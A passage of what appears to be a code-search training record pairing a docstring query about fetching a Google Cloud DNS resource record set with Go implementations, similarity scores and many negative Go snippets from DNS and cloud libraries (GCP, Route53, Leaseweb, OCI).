{\n\t\t\tif rs.Type != \"google_dns_record_set\" {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif strings.HasPrefix(name, \"data.\") {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tp := acctest.GetFwTestProvider(t)\n\n\t\t\turl, err := acctest.ReplaceVarsForFrameworkTest(&p.FrameworkProvider.FrameworkProviderConfig, rs, \"{{DNSBasePath}}projects/{{project}}/managedZones/{{managed_zone}}/rrsets/{{name}}/{{type}}\")\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tbillingProject := \"\"\n\n\t\t\tif !p.BillingProject.IsNull() && p.BillingProject.String() != \"\" {\n\t\t\t\tbillingProject = p.BillingProject.String()\n\t\t\t}\n\n\t\t\t_, diags := fwtransport.SendFrameworkRequest(&p.FrameworkProvider.FrameworkProviderConfig, \"GET\", billingProject, url, p.UserAgent, nil)\n\t\t\tif !diags.HasError() {\n\t\t\t\treturn fmt.Errorf(\"DNSResourceDnsRecordSet still exists at %s\", url)\n\t\t\t}\n\t\t}\n\n\t\treturn nil\n\t}\n}", "func ProtoToResourceRecordSet(p *dnspb.DnsResourceRecordSet) *dns.ResourceRecordSet {\n\tobj := &dns.ResourceRecordSet{\n\t\tDnsName: dcl.StringOrNil(p.DnsName),\n\t\tDnsType: dcl.StringOrNil(p.DnsType),\n\t\tTtl: dcl.Int64OrNil(p.Ttl),\n\t\tManagedZone: dcl.StringOrNil(p.ManagedZone),\n\t\tProject: dcl.StringOrNil(p.Project),\n\t}\n\tfor _, r := range p.GetTarget() {\n\t\tobj.Target = append(obj.Target, r)\n\t}\n\treturn obj\n}", "func (in *RecordSetGroup) GetTemplate(client dynamic.Interface) (string, error) {\n\tif client == nil {\n\t\treturn \"\", fmt.Errorf(\"k8s client not loaded for template\")\n\t}\n\ttemplate := cloudformation.NewTemplate()\n\n\ttemplate.Description = \"AWS Controller - route53.RecordSetGroup (ac-{TODO})\"\n\n\ttemplate.Outputs = map[string]interface{}{\n\t\t\"ResourceRef\": map[string]interface{}{\n\t\t\t\"Value\": cloudformation.Ref(\"RecordSetGroup\"),\n\t\t\t\"Export\": map[string]interface{}{\n\t\t\t\t\"Name\": in.Name + \"Ref\",\n\t\t\t},\n\t\t},\n\t}\n\n\troute53RecordSetGroup := &route53.RecordSetGroup{}\n\n\tif in.Spec.Comment != \"\" {\n\t\troute53RecordSetGroup.Comment = in.Spec.Comment\n\t}\n\n\t// TODO(christopherhein) move these to a defaulter\n\troute53RecordSetGroupHostedZoneRefItem := in.Spec.HostedZoneRef.DeepCopy()\n\n\tif route53RecordSetGroupHostedZoneRefItem.ObjectRef.Namespace == \"\" {\n\t\troute53RecordSetGroupHostedZoneRefItem.ObjectRef.Namespace = in.Namespace\n\t}\n\n\tin.Spec.HostedZoneRef = *route53RecordSetGroupHostedZoneRefItem\n\thostedZoneId, err := in.Spec.HostedZoneRef.String(client)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tif hostedZoneId != \"\" {\n\t\troute53RecordSetGroup.HostedZoneId = hostedZoneId\n\t}\n\n\tif in.Spec.HostedZoneName != \"\" {\n\t\troute53RecordSetGroup.HostedZoneName = in.Spec.HostedZoneName\n\t}\n\n\troute53RecordSetGroupRecordSets := []route53.RecordSetGroup_RecordSet{}\n\n\tfor _, item := range in.Spec.RecordSets {\n\t\troute53RecordSetGroupRecordSet := route53.RecordSetGroup_RecordSet{}\n\n\t\tif !reflect.DeepEqual(item.AliasTarget, RecordSetGroup_AliasTarget{}) {\n\t\t\troute53RecordSetGroupRecordSetAliasTarget := route53.RecordSetGroup_AliasTarget{}\n\n\t\t\tif item.AliasTarget.DNSName != \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetAliasTarget.DNSName = item.AliasTarget.DNSName\n\t\t\t}\n\n\t\t\tif item.AliasTarget.EvaluateTargetHealth || !item.AliasTarget.EvaluateTargetHealth {\n\t\t\t\troute53RecordSetGroupRecordSetAliasTarget.EvaluateTargetHealth = item.AliasTarget.EvaluateTargetHealth\n\t\t\t}\n\n\t\t\t// TODO(christopherhein) move these to a defaulter\n\t\t\troute53RecordSetGroupRecordSetAliasTargetHostedZoneRefItem := item.AliasTarget.HostedZoneRef.DeepCopy()\n\n\t\t\tif route53RecordSetGroupRecordSetAliasTargetHostedZoneRefItem.ObjectRef.Namespace == \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetAliasTargetHostedZoneRefItem.ObjectRef.Namespace = in.Namespace\n\t\t\t}\n\n\t\t\titem.AliasTarget.HostedZoneRef = *route53RecordSetGroupRecordSetAliasTargetHostedZoneRefItem\n\t\t\thostedZoneId, err := item.AliasTarget.HostedZoneRef.String(client)\n\t\t\tif err != nil {\n\t\t\t\treturn \"\", err\n\t\t\t}\n\n\t\t\tif hostedZoneId != \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetAliasTarget.HostedZoneId = hostedZoneId\n\t\t\t}\n\n\t\t\troute53RecordSetGroupRecordSet.AliasTarget = &route53RecordSetGroupRecordSetAliasTarget\n\t\t}\n\n\t\tif item.Comment != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.Comment = item.Comment\n\t\t}\n\n\t\tif item.Failover != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.Failover = item.Failover\n\t\t}\n\n\t\tif !reflect.DeepEqual(item.GeoLocation, RecordSetGroup_GeoLocation{}) {\n\t\t\troute53RecordSetGroupRecordSetGeoLocation := route53.RecordSetGroup_GeoLocation{}\n\n\t\t\tif item.GeoLocation.ContinentCode != \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetGeoLocation.ContinentCode = item.GeoLocation.ContinentCode\n\t\t\t}\n\n\t\t\tif item.GeoLocation.CountryCode != \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetGeoLocation.CountryCode = item.GeoLocation.CountryCode\n\t\t\t}\n\n\t\t\tif item.GeoLocation.SubdivisionCode != \"\" {\n\t\t\t\troute53RecordSetGroupRecordSetGeoLocation.SubdivisionCode = item.GeoLocation.SubdivisionCode\n\t\t\t}\n\n\t\t\troute53RecordSetGroupRecordSet.GeoLocation = &route53RecordSetGroupRecordSetGeoLocation\n\t\t}\n\n\t\t// TODO(christopherhein) move these to a defaulter\n\t\troute53RecordSetGroupRecordSetHealthCheckRefItem := item.HealthCheckRef.DeepCopy()\n\n\t\tif route53RecordSetGroupRecordSetHealthCheckRefItem.ObjectRef.Namespace == \"\" {\n\t\t\troute53RecordSetGroupRecordSetHealthCheckRefItem.ObjectRef.Namespace = in.Namespace\n\t\t}\n\n\t\titem.HealthCheckRef = *route53RecordSetGroupRecordSetHealthCheckRefItem\n\t\thealthCheckId, err := item.HealthCheckRef.String(client)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tif healthCheckId != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.HealthCheckId = healthCheckId\n\t\t}\n\n\t\t// TODO(christopherhein) move these to a defaulter\n\t\troute53RecordSetGroupRecordSetHostedZoneRefItem := item.HostedZoneRef.DeepCopy()\n\n\t\tif route53RecordSetGroupRecordSetHostedZoneRefItem.ObjectRef.Namespace == \"\" {\n\t\t\troute53RecordSetGroupRecordSetHostedZoneRefItem.ObjectRef.Namespace = in.Namespace\n\t\t}\n\n\t\titem.HostedZoneRef = *route53RecordSetGroupRecordSetHostedZoneRefItem\n\t\thostedZoneId, err := item.HostedZoneRef.String(client)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tif hostedZoneId != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.HostedZoneId = hostedZoneId\n\t\t}\n\n\t\tif item.HostedZoneName != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.HostedZoneName = item.HostedZoneName\n\t\t}\n\n\t\tif item.MultiValueAnswer || !item.MultiValueAnswer {\n\t\t\troute53RecordSetGroupRecordSet.MultiValueAnswer = item.MultiValueAnswer\n\t\t}\n\n\t\tif item.Name != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.Name = item.Name\n\t\t}\n\n\t\tif item.Region != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.Region = item.Region\n\t\t}\n\n\t\tif len(item.ResourceRecords) > 0 {\n\t\t\troute53RecordSetGroupRecordSet.ResourceRecords = item.ResourceRecords\n\t\t}\n\n\t\tif item.SetIdentifier != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.SetIdentifier = item.SetIdentifier\n\t\t}\n\n\t\tif item.TTL != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.TTL = item.TTL\n\t\t}\n\n\t\tif item.Type != \"\" {\n\t\t\troute53RecordSetGroupRecordSet.Type = item.Type\n\t\t}\n\n\t\tif item.Weight != route53RecordSetGroupRecordSet.Weight {\n\t\t\troute53RecordSetGroupRecordSet.Weight = item.Weight\n\t\t}\n\n\t}\n\n\tif len(route53RecordSetGroupRecordSets) > 0 {\n\t\troute53RecordSetGroup.RecordSets = route53RecordSetGroupRecordSets\n\t}\n\n\ttemplate.Resources = map[string]cloudformation.Resource{\n\t\t\"RecordSetGroup\": route53RecordSetGroup,\n\t}\n\n\t// json, err := template.JSONWithOptions(&intrinsics.ProcessorOptions{NoEvaluateConditions: true})\n\tjson, err := template.JSON()\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\treturn string(json), nil\n}", "func (sr *ShardReader) GetRecords() <-chan *kinesis.Record {\n\tch := make(chan *kinesis.Record, sr.channelBufferSize)\n\n\tshardIteratorType := aws.String(kinesis.ShardIteratorTypeTrimHorizon)\n\n\titeratorInput := &kinesis.GetShardIteratorInput{\n\t\tStreamName: aws.String(sr.streamName),\n\t\tShardId: aws.String(sr.shardId),\n\t\tShardIteratorType: shardIteratorType,\n\t}\n\n\titerator, err := sr.clientAPI.GetShardIterator(iteratorInput)\n\tif err != nil {\n\t\tsr.err = err\n\t\tclose(ch)\n\t\treturn ch\n\t}\n\n\tgo sr.consumeStream(ch, iterator.ShardIterator)\n\n\treturn ch\n}", "func (q *gcpQuery) queryNameServers(gcpClient gcpclient.Client, managedZone string) (map[string]sets.String, error) {\n\tnameServers := map[string]sets.String{}\n\tlistOpts := gcpclient.ListResourceRecordSetsOptions{}\n\tfor {\n\t\tlistOutput, err := gcpClient.ListResourceRecordSets(managedZone, listOpts)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tfor _, recordSet := range listOutput.Rrsets {\n\t\t\tif recordSet.Type != \"NS\" {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tvalues := sets.NewString()\n\t\t\tfor _, v := range recordSet.Rrdatas {\n\t\t\t\tvalues.Insert(controllerutils.Undotted(v))\n\t\t\t}\n\t\t\tnameServers[controllerutils.Undotted(recordSet.Name)] = values\n\t\t}\n\t\tif listOutput.NextPageToken == \"\" {\n\t\t\treturn nameServers, nil\n\t\t}\n\t\tlistOpts.PageToken = listOutput.NextPageToken\n\t}\n}", "func (r *RuntimeServer) GetTenantResources(context.Context, *pb.Empty) (*pb.TenantResourceList, error) {\n\tres := r.store.GetTenantResourceList()\n\tvar trs = make(map[string]*pb.TenantResource)\n\tfor _, re := range res {\n\t\tvar tr pb.TenantResource\n\t\trunningApps := r.store.GetTenantRunningApp(re.Namespace)\n\t\tfor _, app := range runningApps {\n\t\t\tif app.ServiceKind == model.ServiceKindThirdParty {\n\t\t\t\ttr.RunningAppThirdNum++\n\t\t\t} else if app.ServiceKind == model.ServiceKindInternal {\n\t\t\t\ttr.RunningAppInternalNum++\n\t\t\t}\n\t\t}\n\t\ttr.RunningAppNum = int64(len(runningApps))\n\t\ttr.CpuLimit = re.CPULimit\n\t\ttr.CpuRequest = re.CPURequest\n\t\ttr.MemoryLimit = re.MemoryLimit / 1024 / 1024\n\t\ttr.MemoryRequest = re.MemoryRequest / 1024 / 1024\n\t\ttrs[re.Namespace] = &tr\n\t}\n\treturn &pb.TenantResourceList{Resources: trs}, nil\n}", "func (r *ResourceHandler) GetAllStageResources(project string, stage string) ([]*models.Resource, error) {\n\tr.ensureHandlerIsSet()\n\treturn r.resourceHandler.GetAllStageResources(context.TODO(), project, stage, v2.ResourcesGetAllStageResourcesOptions{})\n}", "func (k Keeper) GetAllRecords(ctx sdk.Context) ([]types.RecordCompositeKey, []types.Record) {\n\tstore := prefix.NewStore(ctx.KVStore(k.storeKey), types.RecordKeyPrefix)\n\titerator := sdk.KVStorePrefixIterator(store, []byte{})\n\tdefer iterator.Close()\n\n\tkeys := make([]types.RecordCompositeKey, 0)\n\tvalues := make([]types.Record, 0)\n\n\tfor ; iterator.Valid(); iterator.Next() {\n\t\tvar key types.RecordCompositeKey\n\t\tcompkey.MustDecode(iterator.Key(), &key)\n\t\tkeys = append(keys, key)\n\n\t\tvar value types.Record\n\t\tk.cdc.MustUnmarshal(iterator.Value(), &value)\n\t\tvalues = append(values, value)\n\t}\n\n\treturn keys, values\n}" ]
[ "0.7884958", "0.71977293", "0.690012", "0.667474", "0.6506424", "0.65049356", "0.6426561", "0.62984467", "0.6185397", "0.61584216", "0.6146449", "0.60125625", "0.6006893", "0.5978852", "0.596062", "0.5958101", "0.59567195", "0.59504706", "0.59106505", "0.5834692", "0.58345544", "0.58345544", "0.57745224", "0.57589066", "0.570134", "0.5678164", "0.5658391", "0.56242156", "0.56123453", "0.55878305", "0.5587197", "0.55722225", "0.5535046", "0.5531626", "0.5501332", "0.5475624", "0.5469746", "0.5452445", "0.53435796", "0.5327744", "0.5321343", "0.52796733", "0.52444947", "0.51903546", "0.51866055", "0.51792973", "0.51756275", "0.51730764", "0.51615435", "0.51035255", "0.5101126", "0.5096557", "0.50667673", "0.50551915", "0.5028899", "0.5002444", "0.5001357", "0.49717578", "0.49650255", "0.49583077", "0.49540594", "0.49492484", "0.49481398", "0.4945164", "0.4935055", "0.49242976", "0.49220583", "0.4919079", "0.4899817", "0.4894822", "0.48906025", "0.48871127", "0.48767948", "0.48724502", "0.4863394", "0.485785", "0.48185384", "0.4810767", "0.47803998", "0.47654358", "0.47561428", "0.4751344", "0.47382775", "0.47365394", "0.47344375", "0.47201422", "0.47185433", "0.47144502", "0.47129834", "0.47110206", "0.46927866", "0.46882734", "0.46864077", "0.46837017", "0.4679446", "0.46789417", "0.46726656", "0.4669664", "0.46631277", "0.46631274" ]
0.749032
1
GetResourceRecordSet will search for an existing record set by the resourcer record set name
func (d *DNS) GetResourceRecordSet(projectID string, managedZone string, name string) (*v1.ResourceRecordSet, error) { ctx := context.Background() rrsService := v1.NewResourceRecordSetsService(d.V1) rrsListCall := rrsService.List(projectID, managedZone).Context(ctx).Name(name) rrsList, err := d.Calls.ResourceRecordSetsList.Do(rrsListCall) if err != nil { return nil, err } if len(rrsList.Rrsets) == 0 { return nil, nil } return rrsList.Rrsets[0], nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func GetResourceRecordSet(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *ResourceRecordSetState, opts ...pulumi.ResourceOption) (*ResourceRecordSet, error) {\n\tvar resource ResourceRecordSet\n\terr := ctx.ReadResource(\"google-native:dns/v1beta2:ResourceRecordSet\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GetRecordSet(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *RecordSetState, opts ...pulumi.ResourceOption) (*RecordSet, error) {\n\tvar resource RecordSet\n\terr := ctx.ReadResource(\"gcp:dns/recordSet:RecordSet\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GetRecordSet(ctx *pulumi.Context,\n\tname string, id pulumi.IDInput, state *RecordSetState, opts ...pulumi.ResourceOption) (*RecordSet, error) {\n\tvar resource RecordSet\n\terr := ctx.ReadResource(\"gcp:dns/recordSet:RecordSet\", name, id, state, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (s *cloudDNSService) getResourceRecordSets(dnsZone string) ([]*dns.ResourceRecordSet, error) {\n\ttimer := pkg.NewTimer(prometheus.ObserverFunc(func(v float64) {\n\t\trequestRecordsTimeSummary.WithLabelValues(dnsZone).Observe(v)\n\t}))\n\tdefer timer.ObserveDuration()\n\n\tpageToken := \"\"\n\n\tresourceRecordSets := make([]*dns.ResourceRecordSet, 0, 16)\n\tfor {\n\t\treq := s.service.ResourceRecordSets.List(s.project, dnsZone)\n\t\tif pageToken != \"\" {\n\t\t\treq.PageToken(pageToken)\n\t\t}\n\t\tresp, err := req.Do()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"[Cloud DNS] Error getting DNS resourceRecordSets from zone %s: %v\", dnsZone, err)\n\t\t}\n\t\tfor _, r := range resp.Rrsets {\n\t\t\tresourceRecordSets = append(resourceRecordSets, r)\n\t\t}\n\t\tif resp.NextPageToken == \"\" {\n\t\t\tbreak\n\t\t}\n\t\tpageToken = resp.NextPageToken\n\t}\n\treturn resourceRecordSets, nil\n}", "func findRecord(d *schema.ResourceData, meta interface{}) (*route53.ResourceRecordSet, error) {\n\tconn := meta.(*AWSClient).r53conn\n\t// Scan for a\n\tzone := cleanZoneID(d.Get(\"zone_id\").(string))\n\n\t// get expanded name\n\tzoneRecord, err := conn.GetHostedZone(&route53.GetHostedZoneInput{Id: aws.String(zone)})\n\tif err != nil {\n\t\tif r53err, ok := err.(awserr.Error); ok && r53err.Code() == \"NoSuchHostedZone\" {\n\t\t\treturn nil, r53NoHostedZoneFound\n\t\t}\n\t\treturn nil, err\n\t}\n\n\ten := expandRecordName(d.Get(\"name\").(string), *zoneRecord.HostedZone.Name)\n\tlog.Printf(\"[DEBUG] Expanded record name: %s\", en)\n\td.Set(\"fqdn\", en)\n\n\tlopts := &route53.ListResourceRecordSetsInput{\n\t\tHostedZoneId: aws.String(cleanZoneID(zone)),\n\t\tStartRecordName: aws.String(en),\n\t\tStartRecordType: aws.String(d.Get(\"type\").(string)),\n\t}\n\n\tlog.Printf(\"[DEBUG] List resource records sets for zone: %s, opts: %s\",\n\t\tzone, lopts)\n\tresp, err := conn.ListResourceRecordSets(lopts)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfor _, record := range resp.ResourceRecordSets {\n\t\tname := cleanRecordName(*record.Name)\n\t\tif FQDN(strings.ToLower(name)) != FQDN(strings.ToLower(*lopts.StartRecordName)) {\n\t\t\tcontinue\n\t\t}\n\t\tif strings.ToUpper(*record.Type) != strings.ToUpper(*lopts.StartRecordType) {\n\t\t\tcontinue\n\t\t}\n\n\t\tif record.SetIdentifier != nil && *record.SetIdentifier != d.Get(\"set_identifier\") {\n\t\t\tcontinue\n\t\t}\n\t\t// The only safe return where a record is found\n\t\treturn record, nil\n\t}\n\treturn nil, r53NoRecordsFound\n}", "func (s *FastDNSv2Service) GetRecordSet(ctx context.Context, opt *RecordSetOptions) (*RecordSet, *Response, error) {\n\tu := fmt.Sprintf(\"/config-dns/v2/zones/%v/names/%v/types/%v\", opt.Zone, opt.Name, opt.Type)\n\n\treq, err := s.client.NewRequest(\"GET\", u, nil)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\n\tvar rs *RecordSet\n\tresp, err := s.client.Do(ctx, req, &rs)\n\tif err != nil {\n\t\treturn nil, resp, err\n\t}\n\n\treturn rs, resp, nil\n}", "func (d *DNS) GetResourceRecordSets(projectID string, managedZone string) ([]*v1.ResourceRecordSet, error) {\n\tctx := context.Background()\n\trrsService := v1.NewResourceRecordSetsService(d.V1)\n\trrsListCall := rrsService.List(projectID, managedZone).Context(ctx)\n\trrsList, err := d.Calls.ResourceRecordSetsList.Do(rrsListCall)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn rrsList.Rrsets, nil\n}", "func (client DnsClient) getRRSet(ctx context.Context, request common.OCIRequest) (common.OCIResponse, error) {\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/zones/{zoneNameOrId}/records/{domain}/{rtype}\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response GetRRSetResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func NewResourceRecordSet(ctx *pulumi.Context,\n\tname string, args *ResourceRecordSetArgs, opts ...pulumi.ResourceOption) (*ResourceRecordSet, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.ManagedZone == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'ManagedZone'\")\n\t}\n\treplaceOnChanges := pulumi.ReplaceOnChanges([]string{\n\t\t\"managedZone\",\n\t\t\"project\",\n\t})\n\topts = append(opts, replaceOnChanges)\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource ResourceRecordSet\n\terr := ctx.RegisterResource(\"google-native:dns/v1beta2:ResourceRecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (p *Provider) GetRecords(ctx context.Context, zone string) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\treq, err := http.NewRequest(http.MethodGet, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\tres, err := client.Do(req)\n\tdefer res.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t}\n\n\tdata, err := ioutil.ReadAll(res.Body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar recordSets LeasewebRecordSets\n\tjson.Unmarshal([]byte(data), &recordSets)\n\n\tvar records []libdns.Record\n\n\tfor _, resourceRecordSet := range recordSets.ResourceRecordSets {\n\t\tfor _, content := range resourceRecordSet.Content {\n\t\t\trecord := libdns.Record{\n\t\t\t\tName: resourceRecordSet.Name,\n\t\t\t\tValue: content,\n\t\t\t\tType: resourceRecordSet.Type,\n\t\t\t\tTTL: time.Duration(resourceRecordSet.TTL) * time.Second,\n\t\t\t}\n\t\t\trecords = append(records, record)\n\t\t}\n\t}\n\n\treturn records, nil\n}", "func NewRecordSet(ctx *pulumi.Context,\n\tname string, args *RecordSetArgs, opts ...pulumi.ResourceOption) (*RecordSet, error) {\n\tif args == nil || args.ManagedZone == nil {\n\t\treturn nil, errors.New(\"missing required argument 'ManagedZone'\")\n\t}\n\tif args == nil || args.Rrdatas == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Rrdatas'\")\n\t}\n\tif args == nil || args.Ttl == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Ttl'\")\n\t}\n\tif args == nil || args.Type == nil {\n\t\treturn nil, errors.New(\"missing required argument 'Type'\")\n\t}\n\tif args == nil {\n\t\targs = &RecordSetArgs{}\n\t}\n\tvar resource RecordSet\n\terr := ctx.RegisterResource(\"gcp:dns/recordSet:RecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func GetRecord(zoneID string, domainname string) (RecordValues, error) {\n\tvar r RecordValues\n\tb, err := proc.RunW(\"aws\", \"route53\", \"list-resource-record-sets\", \"--hosted-zone-id\", zoneID, \"--query\", fmt.Sprintf(\"ResourceRecordSets[?Name == '%s']\", domainname))\n\tif err != nil {\n\t\treturn r, err\n\t}\n\n\tv := []ResourceRecordSet{}\n\terr = json.Unmarshal([]byte(b), &v)\n\tif err != nil {\n\t\treturn r, err\n\t}\n\tif len(v) == 0 {\n\t\treturn r, nil\n\t}\n\n\tr = RecordValues{v[0].Name, v[0].Type, v[0].ResourceRecords[0].Value}\n\treturn r, nil\n}", "func NewRecordSet(ctx *pulumi.Context,\n\tname string, args *RecordSetArgs, opts ...pulumi.ResourceOption) (*RecordSet, error) {\n\tif args == nil {\n\t\treturn nil, errors.New(\"missing one or more required arguments\")\n\t}\n\n\tif args.ManagedZone == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'ManagedZone'\")\n\t}\n\tif args.Name == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'Name'\")\n\t}\n\tif args.Type == nil {\n\t\treturn nil, errors.New(\"invalid value for required argument 'Type'\")\n\t}\n\topts = internal.PkgResourceDefaultOpts(opts)\n\tvar resource RecordSet\n\terr := ctx.RegisterResource(\"gcp:dns/recordSet:RecordSet\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func (parser *MRCPParser) MRCPParserResourceSet(name string) {\n\n}", "func (s *ResourceRecordSetServer) applyResourceRecordSet(ctx context.Context, c *dns.Client, request *dnspb.ApplyDnsResourceRecordSetRequest) (*dnspb.DnsResourceRecordSet, error) {\n\tp := ProtoToResourceRecordSet(request.GetResource())\n\tres, err := c.ApplyResourceRecordSet(ctx, p)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tr := ResourceRecordSetToProto(res)\n\treturn r, nil\n}", "func LookupResourceSet(ctx *pulumi.Context, args *LookupResourceSetArgs, opts ...pulumi.InvokeOption) (*LookupResourceSetResult, error) {\n\topts = internal.PkgInvokeDefaultOpts(opts)\n\tvar rv LookupResourceSetResult\n\terr := ctx.Invoke(\"aws-native:fms:getResourceSet\", args, &rv, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &rv, nil\n}", "func (d *DNS) SetResourceRecordSets(projectID string, managedZone string, records []*v1.ResourceRecordSet) error {\n\tvar deletions []*v1.ResourceRecordSet\n\tvar additions []*v1.ResourceRecordSet\n\tvar change *v1.Change\n\tlogItems := []string{}\n\tfor _, record := range records {\n\t\texisting, err := d.GetResourceRecordSet(projectID, managedZone, record.Name)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"Error trying to get existing resource record set: %s\", err)\n\t\t}\n\t\taction := \"creating\"\n\t\tif existing != nil {\n\t\t\tdeletions = append(deletions, existing)\n\t\t\taction = \"recreating\"\n\t\t}\n\t\tlogItems = append(logItems, fmt.Sprintf(\"====> %s %s => %s %s\", action, record.Name, record.Type, strings.Join(record.Rrdatas, \",\")))\n\t\tadditions = append(additions, record)\n\t}\n\td.log.Info(\"Ensuring the DNS zone %s has the following records:\", managedZone)\n\tfor _, item := range logItems {\n\t\td.log.ListItem(item)\n\t}\n\tif len(deletions) > 0 {\n\t\tchange = &v1.Change{\n\t\t\tDeletions: deletions,\n\t\t}\n\t\tif err := d.executeChange(projectID, managedZone, change); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\tchange = &v1.Change{\n\t\tAdditions: additions,\n\t}\n\tif err := d.executeChange(projectID, managedZone, change); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (o DatasourceSetOutput) ResourceName() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v DatasourceSet) *string { return v.ResourceName }).(pulumi.StringPtrOutput)\n}", "func (s *ResourceRecordSetServer) ListDnsResourceRecordSet(ctx context.Context, request *dnspb.ListDnsResourceRecordSetRequest) (*dnspb.ListDnsResourceRecordSetResponse, error) {\n\tcl, err := createConfigResourceRecordSet(ctx, request.ServiceAccountFile)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresources, err := cl.ListResourceRecordSet(ctx, request.Project, request.ManagedZone)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar protos []*dnspb.DnsResourceRecordSet\n\tfor _, r := range resources.Items {\n\t\trp := ResourceRecordSetToProto(r)\n\t\tprotos = append(protos, rp)\n\t}\n\treturn &dnspb.ListDnsResourceRecordSetResponse{Items: protos}, nil\n}", "func (p *Provider) SetRecords(ctx context.Context, zone string, records []libdns.Record) ([]libdns.Record, error) {\n\tp.mutex.Lock()\n\tdefer p.mutex.Unlock()\n\n\tclient := &http.Client{}\n\n\tvar updatedRecords []libdns.Record\n\n\tvar resourceRecordSets []LeasewebRecordSet\n\n\tfor _, record := range records {\n\n\t\trecordSet := LeasewebRecordSet{\n\t\t\tName: record.Name,\n\t\t\tType: record.Type,\n\t\t\tContent: []string{record.Value},\n\t\t\tTTL: int(record.TTL.Seconds()),\n\t\t}\n\n\t\tresourceRecordSets = append(resourceRecordSets, recordSet)\n\n\t\tupdatedRecords = append(updatedRecords, record)\n\t}\n\n\tbody := &LeasewebRecordSets{\n\t\tResourceRecordSets: resourceRecordSets,\n\t}\n\n\tbodyBuffer := new(bytes.Buffer)\n\tjson.NewEncoder(bodyBuffer).Encode(body)\n\n\treq, err := http.NewRequest(http.MethodPut, fmt.Sprintf(\"https://api.leaseweb.com/hosting/v2/domains/%s/resourceRecordSets\", zone), bodyBuffer)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(LeasewebApiKeyHeader, p.APIKey)\n\n\tres, err := client.Do(req)\n\tdefer res.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tif res.StatusCode < 200 || res.StatusCode > 299 {\n\t\treturn nil, fmt.Errorf(\"Received StatusCode %d from Leaseweb API\", res.StatusCode)\n\t}\n\n\treturn updatedRecords, nil\n}", "func (s dnsRecordSetNamespaceLister) Get(name string) (*v1alpha1.DnsRecordSet, error) {\n\tobj, exists, err := 